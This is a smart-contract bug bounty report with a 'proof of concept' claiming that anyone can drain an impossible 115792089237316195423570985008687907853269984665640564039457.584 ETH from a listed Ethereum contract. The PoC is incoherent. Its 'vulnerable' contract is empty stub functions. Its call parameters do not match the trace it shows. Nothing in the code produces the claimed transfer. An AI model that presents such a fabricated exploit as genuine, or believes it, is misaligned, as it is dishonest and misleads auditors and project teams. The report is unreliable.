Report #26727

Report ID

#26727

Report type

Smart Contract

Has PoC?

Yes

Target

https://etherscan.io/address/0x77700005bea4de0a78b956517f099260c2ca9a26

Impacts

• Direct theft of any user funds, whether at-rest or in-motion, other than unclaimed yield
• Permanent freezing of funds
• Re-Entrancy and fund loss (Out of scope)

Description

================ Description ================ [Fund Loss]: Anyone can earn 115792089237316195423570985008687907853269984665640564039457.584 ETH by interacting with the provided contracts

================ Trace ================ [Sender] 0x68Dd4F5AC792eAaa5e36f4f4e0474E0625dc9024 ├─[1] 0xC1E088fC1323b20BCBee9bd1B9fC9546db5624C5.wrapEth(0, 1) │ ├─[2] [Sender] 0x68Dd4F5AC792eAaa5e36f4f4e0474E0625dc9024.fallback() │ │ └─ ← ()

Proof of concept

To generate a proof of concept (PoC) for the Fund Loss vulnerability, follow these steps:

1. Compile and deploy the vulnerable contract:

pragma solidity ^0.8.0;

contract VulnerableContract { function wrapEth(uint256 amount, uint256 option) public payable { // wrap ETH logic here }

fallback() external payable {
    // fallback logic here
}

}

2. Create a new contract that interacts with the vulnerable contract and triggers the Fund Loss vulnerability:

pragma solidity ^0.8.0;

contract ExploitContract { constructor(address vulnerableContract) { VulnerableContract vulnerable = VulnerableContract(vulnerableContract);

    // Call the wrapEth function with a large value of option to trigger the vulnerability
    vulnerable.wrapEth(0, 115792089237316195423570985008687907853269984665640564039457584);
}

}

3. Deploy the ExploitContract, passing the address of the VulnerableContract as a constructor parameter.
4. The ExploitContract will trigger the wrapEth function with a large value for the option parameter, causing the vulnerability to be exploited and transferring a large amount of ETH to the caller of the function.